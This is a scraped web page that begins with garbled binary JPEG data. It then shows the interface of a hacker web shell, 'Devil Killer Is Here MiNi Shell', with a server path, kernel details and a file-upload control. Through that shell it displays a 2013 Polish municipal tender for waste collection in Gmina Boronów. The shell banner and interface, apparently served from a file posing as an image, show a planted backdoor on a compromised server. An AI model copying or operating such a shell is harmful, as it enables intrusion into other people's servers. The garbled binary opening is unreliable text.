JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130419/155726-N-2013.html

<p class="kh_header"><b>Boronów: Odbieranie i zagospodarowywanie  odpadów komunalnych od właścicieli nieruchomości zamieszkałych w  Gminie Boronów</b><br>
<b>Numer ogłoszenia: 155726 - 2013; data zamieszczenia: 19.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boronów , ul. Dolna 2, 42-283 Boronów, woj. śląskie, tel. 034 3539100, faks 034 3669814.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.boronow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowywanie  odpadów komunalnych od właścicieli nieruchomości zamieszkałych w  Gminie Boronów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie i zagospodarowywanie  wskazanych w opisie zamówienia rodzajów odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie gminy Boronów, wyposażenie mieszkańców w pojemniki i worki do niezbędne do gromadzenia odpadów oraz utworzenie i obsługa Punktu Selektywnego Zbioru Odpadów Komunalnych. Przedmiot zamówienia obejmuje załadunek, transport i zagospodarowanie  odpadów w instalacjach regionalnych określonych w Planie Gospodarki Odpadami Województwa Śląskiego 
Przedmiotem zamówienia jest odbieranie i zagospodarowywanie  odpadów komunalnych z nieruchomości zamieszkałych na terenie Gminy Boronów. Wykaz posesji stanowi załącznik nr 9 do SIWZ  (stan na dzień 15.04.2013 r. do dnia 15.06.2013 Wykonawca otrzyma zaktualizowany wykaz) Przedmiot zamówienia obejmuje załadunek, transport  oraz:
przekazanie odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwienia odpadów,  
przekazywanie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania  odpadów komunalnych przeznaczonych do składowania w regionalnej instalacji do przetwarzania odpadów komunalnych, zgodnie z rejonizacją ustaloną w Wojewódzkim Planie Gospodarki Odpadami Województwa Śląskiego. Pojemniki do gromadzenia zmieszanych odpadów komunalnych w poszczególnych posesjach zapewni Wykonawca w ramach prowadzonej usługi.(po zakończeniu realizacji usługi pojemniki pozostają własnością Wykonawcy) Wykaz posesji do których należy dostarczyć pojemniki wraz z informacją o ich wymaganej  pojemności stanowi Załącznik Nr 9 do SIWZ. Zmieszane (niesegregowane) odpady komunalne w nieruchomościach zamieszkałych będą gromadzone w pojemnikach 120 litrów,  240 litrów, 360 litrów i 1100 litrów dostarczonych przez Wykonawcę. Odbiór odpadów zmieszanych  będzie się odbywał jeden raz w miesiącu bezpośrednio z  miejsca przy granicy nieruchomości dostawcy odpadów. Selektywna zbiórka odpadów komunalnych będzie się odbywać w systemie workowym.
wprowadza się cztery rodzaje worków: 
ŻÓŁTY  z przeznaczeniem na opakowania z tworzyw sztucznych i metali oraz  opakowania wielomateriałowe.
ZIELONY  z przeznaczeniem na szkło i opakowania szklane,
NIEBIESKI z przeznaczeniem na papier, tekturę, gazety, książki, katalogi, itp.
BRĄZOWY z przeznaczeniem na odpady ulegające biodegradacji.
Charakterystyka worków: 
materiał: folia  LDPE , 
grubość: co najmniej 60 mikronów
pojemność:  120 litrów,
nadruk: jednostronny o treści uzgodnionej  pomiędzy Wykonawcą  a Zamawiającym  najpóźniej na 30 dni  przed rozpoczęciem realizacji zamówienia.
worki do selektywnej zbiórki zapewnia Wykonawca. Wykaz posesji do których należy dostarczyć worki wraz z informacją o ich liczbie i kolorze   stanowi Załącznik Nr 9 do SIWZ. Odbiór odpadów  z  nieruchomości zamieszkałych będzie się odbywał jeden raz w miesiącu bezpośrednio z ustalonego miejsca przy granicy nieruchomości dostawcy odpadów.
Worki przekazywane do realizacji zamówienia Wykonawca ma obowiązek spiąć np. tzw. gumką recepturką i zawiesić w miejscu widocznym dla mieszkańców np. na ogrodzeniu posesji. 
Kolejne worki dostarczane będą w systemie: za każdy odebrany napełniony worek   Wykonawca na posesji pozostawia worek pusty.
Ponadto Wykonawca dostarczy do Urzędu Gminy zapas worków każdego rodzaju, (200 szt. żółtych i po 100 szt. pozostałych kolorów) które będą wydawane mieszkańcom, którym w danym miesiącu nie wystarczyły worki otrzymane pierwotnie. Zapas te Wykonawca będzie uzupełniał w miarę potrzeb Zamawiającego.
Odpady wielkogabarytowe, wszystkie rodzaje opon i zużyty sprzęt elektryczny i elektroniczny będzie odbierany dwa razy w roku bezpośrednio z terenu nieruchomości.
Pojemniki na zużyte baterie i akumulatory przenośne będą ustawione w miejscach użyteczności publicznej na terenie Gminy Boronów (maksymalnie 4 lokalizacje) i  odbierane przez Wykonawcę na zgłoszenie telefoniczne. Pojemniki do przedmiotowej zbiórki zapewnia Wykonawca.
Pojemniki na przeterminowane leki będą ustawione w miejscach użyteczności publicznej na terenie Gminy Boronów (maksymalnie 2 lokalizacje) i odbierane przez Wykonawcę na zgłoszenie telefoniczne. Pojemniki do przedmiotowej zbiórki zapewnia Wykonawca. 
Odpady z remontów odbierane są od mieszkańców w przeznaczonych do tego celu workach lub kontenerach na podstawie zgłoszenia Wykonawcy, który ma   w ramach zryczałtowanej opłaty odebrać wyłącznie te odpady budowlano-remontowe i rozbiórkowe, które powstały w wyniku prowadzenia drobnych robót nie wymagających pozwolenia na budowę ani zgłoszenia zamiaru prowadzenia robót do starosty; odpady nie spełniające tej definicji Wykonawca  ma obowiązek odebrać za dodatkową opłatą.
Inne odpady niebezpieczne, np. nieużywane pozostałości rozpuszczalników, farb, olejów odpadowych, wraz z opakowaniami, oddzielnie dla każdego rodzaju odpadu odbierane będą w Punkcie Selektywnej Zbiórki Odpadów Komunalnych .
Zagospodarowanie i odbieranie odpadów winno być zgodne z obowiązującymi przepisami prawnymi, w szczególności z:
Ustawą z dnia 14 grudnia 2012 r. o odpadach (tj. Dz.U. z 2013 r. poz. 21)
Ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w Gminach (tj. Dz. U. z 2012 r. poz. 391 z późn. zm.)
Ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tj. Dz. U. z 2008r. Nr 25 poz. 150 z późn. zm.)
Uchwałą Nr IV 25 1 2012 z dnia 24 sierpnia 2012 roku Sejmiku  Województwa Śląskiego w sprawie  Planu gospodarki odpadami dla województwa śląskiego Uchwałą nr 90 XXVIII 2012 Rady Gminy Boronów  z dnia 27.12.2012 r. w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy Boronów, Uchwałą nr 93 XXVIII 2012 Rady Gminy Boronów z dnia 27.12.2012 r. w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi.
Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122),
Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r., w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630)
Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645)
Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r., poz. 676)
Charakterystyka Gminy BoronówPowierzchnia Gminy około 54   km2
Liczba mieszkańców w Gminie Boronów  wynosi około 2894 osób  w zabudowie jednorodzinnej - około 831 gospodarstw domowych. (stan na dzień 15.04.2013 r.)
Obowiązki  Wykonawcy  przed rozpoczęciem i w trakcie realizacji zamówienia:
Na 30 dni przed rozpoczęciem realizacji zamówienia Wykonawca dostarczy projekt harmonogramu odbioru wszystkich odpadów komunalnych  (zmieszanych, segregowanych, gabarytowych itd.) celem uzgodnienia z Zamawiającym. Zamawiający  przedstawi swoje uwagi  do harmonogramu w terminie 14 dni.Wykonawca ma obowiązek wyposażenia właścicieli wszystkich nieruchomości objętych zbiórką odpadów w pojemniki i worki niezbędne do gromadzenia odpadów przed pierwszym dniem obowiązywania umowy na odbiór odpadów zawartej z Zamawiającym. Wykonawca winien posiadać potwierdzenie odbioru pojemników i worków przez właściciela nieruchomości. 
Wykonawca zobowiązany jest osiągnąć  odpowiednie poziomy recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach, oraz Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych.
W przypadku zmniejszenia liczby mieszkańców nieruchomości  (z 5 do 4; z 9 do 8 itd.) Wykonawca ma prawo do odebrania pojemnika na zmieszane odpady komunalne, tak aby zapewnić minimalne wyposażenie nieruchomości, zgodnie z zasadami ustalonymi w Regulaminie utrzymania porządku i czystości na terenie Gminy Boronów:  rodzina licząca do czterech osób zostanie wyposażona w jeden pojemnik na odpady zmieszane o pojemności minimum 110  ; rodzina licząca powyżej czterech osób wyposażona zostanie (...) w dodatkowe pojemniki o pojemności minimum 110 l tak, aby na każde cztery osoby ilość pojemników minimum110 l wzrastała o dodatkową sztukę W przypadku zwiększenia liczby mieszkańców nieruchomości Wykonawca ma obowiązek wyposażyć nieruchomość w dodatkowy pojemnik na zmieszane odpady komunalne tak aby zapewnić minimalne wyposażenie nieruchomości, zgodnie z zasadami ustalonymi w Regulaminie utrzymania porządku i czystości na terenie Gminy Boronów:  rodzina licząca do czterech osób zostanie wyposażona w jeden pojemnik na odpady zmieszane o pojemności minimum 110 l ; rodzina licząca powyżej czterech osób wyposażona zostanie (...) w dodatkowe pojemniki o pojemności minimum 110 l tak, aby na każde cztery osoby ilość pojemników minimum110 l wzrastała o dodatkową sztukę
Wykonawca zobowiązany jest do odbioru w terminach ustalonych w rocznym harmonogramie zarówno zmieszanych odpadów komunalnych jak również odpadów z selektywnej zbiórki wystawionych do odbioru w miejscu uzgodnionym z właścicielem  nieruchomości. Odbiór będzie dokonywany w dni robocze od poniedziałku do piątku w godzinach od 7.00 do 20.00.
Wykonawca zobowiązany jest do kontroli prawidłowości prowadzenia selektywnej zbiórki odpadów przez mieszkańców. W przypadku niedopełnienia przez mieszkańca standardów selektywnej zbiórki odpadów, Wykonawca sporządza na tę okoliczność dokumentację (np. protokół, dokumentację fotograficzną) i przekazuje Zamawiającemu w terminie 2 dni roboczych od zaistnienia zdarzenia. Ponadto  Wykonawca umieszcza na pokrywie pojemnika znacznik (np. samoprzylepna kartka) 
w kolorze żółtym informujący właściciela nieruchomości o zakwalifikowaniu odebranych odpadów jako zmieszanych.
Załadunek jak i transport odpadów będzie się odbywał  za pomocą odpowiedniego sprzętu oraz środków transportu, które muszą być w dyspozycji Wykonawcy.
Wykonawca zobowiązany jest do utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń do odbierania odpadów komunalnych od właścicieli nieruchomości Wykonawca zobowiązany jest do uprzątnięcia miejsc po odbiorze odpadów komunalnych Wykonawca winien zapewnić kontakt telefoniczny co najmniej w godzinach 7.00-15.00 celem nadzorowania przez Zamawiającego odbierania odpadów na terenie gminy
Wykonawca jest zobowiązany do sporządzania kwartalnych sprawozdań i przekazywania ich do Urzędu Gminy Boronów w terminie do końca miesiąca następującego po kwartale. Sprawozdania należy wykonywać zgodnie z art. 9n ustawy z dnia  13 września 1996 roku o utrzymaniu czystości i porządku w gminach.
Za szkody w majątku Zamawiającego lub osób trzecich spowodowane odbiorem odpadów ponosi Wykonawca.
Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków, pojazdów w trakcie realizacji usługi wywozu.
Wykonawca jest zobowiązany do odbioru odpadów z pojemników dostarczonych mieszkańcom w ramach realizacji usługi jak i z pojemników dodatkowych, w które mieszkaniec wyposażył nieruchomość indywidualnie.
Wykonawca jest zobowiązany do zbierania odpadów leżących luzem obok zapełnionych pojemników, kontenerów  oraz doprowadzenia do porządku terenów przyległych, zanieczyszczonych na skutek przepełnienia wymienionych urządzeń do gromadzenia odpadów, obowiązek ten winien być realizowany niezwłocznie po opróżnieniu pojemników, kontenerów 
Wykonawca jest obowiązany do realizacji reklamacji (nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niepozostawienie worków na odpady segregowane itp) w przeciągu 24 godzin od otrzymania zawiadomienia e-mailem od Zamawiającego. Załatwienie reklamacji należy niezwłocznie potwierdzić na e-mail Zamawiającego System odbierania odpadów komunalnych nie obejmuje odpadów powstających w wyniku prowadzenia działalności gospodarczej.
Wykonawca zobowiązany jest do prowadzenia i przekazywania co miesiąc Zamawiającemu ewidencji nieruchomości, z których zostały odebrane zmieszane i selektywnie zebrane odpady, w zakresie ilości zebranych odpadów (ilość i pojemność pojemników z odpadami zmieszanych oraz ilość poszczególnych worków z odpadami zebranymi selektywnie).
Wykonawca zobowiązany jest do przekazywania odebranych zmieszanych odpadów komunalnych, pozostałości z sortowania odpadów komunalnych oraz odpadów zielonych do regionalnych instalacji przetwarzania odpadów komunalnych wskazanych w Planie gospodarki odpadami dla województwa śląskiego 2014 dla Regionu I oraz do przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7 ustawy z dnia 27 kwietnia 2001 r., o odpadach (Dz.U. z 2010 r. Nr 185, poz. 1243 z późn. zm.).
Wykonawca zobowiązany jest posiadać bazę magazynowo - transportową usytuowaną w odległości nie większej niż 60 km od granicy Gminy Boronów, na terenie, do którego posiada tytuł prawny
Wykonawca zobowiązany jest do utworzenia i obsługi  Punktu Selektywnej Zbiórki Odpadów Komunalnych. Punkt ma zostać utworzony na działce o numerze 583/5 stanowiącej własność Zamawiającego. Działka ma powierzchnię 1205 m2 i jest ogrodzona. Na jej terenie znajduje się budynek oczyszczalni ścieków o powierzchni ok. 132 m2 , pozostała część działki do zagospodarowania na utworzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych. Punkt musi być czynny  3 razy w tygodniu (wtorek: od 900 - 1200, czwartek: 1500 - 1800, sobota: 900 - 1200). Punkt należy wyposażyć w  pojemniki na odpady, które będą odbierane przez Wykonawcę po ich zapełnieniu. 
Wymagane wyposażenie PSZOK określa poniższa tabela:
Rodzaj odpadów Pojemnik ilość pojemność
przeterminowane leki i chemikalia 50 l  - 1 pojemnik
zużyte baterie i akumulatory 50 l - 1 pojemnik
zużyty sprzęt elektryczny i elektroniczny 6000 l - 1 pojemnik z pokrywą
odpady budowlane i rozbiórkowe 6000 l - 1 pojemnik 
zużyte opony Luzem na terenie PSZOK
inne odpady niebezpieczne 1100 l - 1 pojemnik z pokrywą
papier 1100 l - 1 pojemnik z pokrywą
metal, tworzywa sztuczne i opakowania wielomateriałowe 1100 l - 1 pojemnik
szkło 1100 l - 1 pojemnik
odpady zielone z pielęgnacji ogrodów 6000 l - 1 pojemnik z pokrywą
odpady wielkogabarytowe Luzem na terenie PSZOK

Właściciele nieruchomości zamieszkałych z terenu Gminy Boronów będą mogli przekazywać do punktu następujące rodzaje odpadów:  papier, tworzywa sztuczne, opakowania wielomateriałowe, szkło, metal, chemikalia, zużyte baterie i akumulatory, przeterminowane leki, zużyty sprzęt elektryczny i elektroniczny, meble i inne odpady wielkogabarytowe, odpady budowlane i rozbiórkowe, odpady zielone i biodegradowalne, , zużyte opony pochodzące z gospodarstw domowych oraz pozostałe odpady wysegregowane pochodzące z gospodarstw domowych. Wykonawca jest zobowiązany prowadzić dokumentację zawierającą wykaz posesji z których mieszkańcy dostarczyli odpady zebrane selektywnie, ich rodzaj i ilość oraz sposób zagospodarowania wraz ze wskazaniem instalacji do której zostały przekazane (karty przekazania odpadu). Dokum
entację należy przekazywać Zamawiającemu raz w miesiącu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający   przewiduje możliwość udzielenia  zamówień uzupełniających z zakresu odbioru i zagospodarowywania odpadów komunalnych z nieruchomości zamieszkałych na terenie Gminy Boronów  do 50  wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.00.00.00-7, 90.51.32.00-8, 90.50.00.00-2, 90.53.30.00-2, 90.51.40.00-3, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości 5.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1.  Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca posiada:
 aktualne pozwolenie Starosty na transport odpadów komunalnych, w tym odpadów niebezpiecznych wyłonionych ze strumienia odpadów komunalnych z grupy 15 i 20,
aktualny wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Boronów , w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości,
wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska lub zapewnienie gotowości przyjęcia odpadów przez przedsiębiorcę  posiadającego wpis do rejestru, o którym mowa wyżej,
aktualne zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów komunalnych lub zapewnienie gotowości przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże że:  zrealizował  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału  w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 1  usługę w zakresie odbioru odpadów komunalnych zmieszanych i segregowanych w ilości łącznie co najmniej 500 ton rocznie, załączając jednocześnie dokumenty potwierdzające, że te usługa została wykonana lub jest wykonywana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, iż na czas realizacji  zamówienia będzie dysponował odpowiednim sprzętem:
Co najmniej dwoma samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych
- Co najmniej dwoma samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych
Co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej
b) Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, w okresie jednego roku średnie roczne zatrudnienie u wykonawcy usługi oraz liczebność personelu kierowniczego wynosiło łącznie  min. 10 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, iż jest ubezpieczony  od odpowiedzialności cywilnej w zakresie działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 200.000,00 złotych (słownie : dwieście  tysięcy  złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1  usługa w zakresie odbioru odpadów komunalnych zmieszanych i segregowanych w ilości łącznie co najmniej 500 ton rocznie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

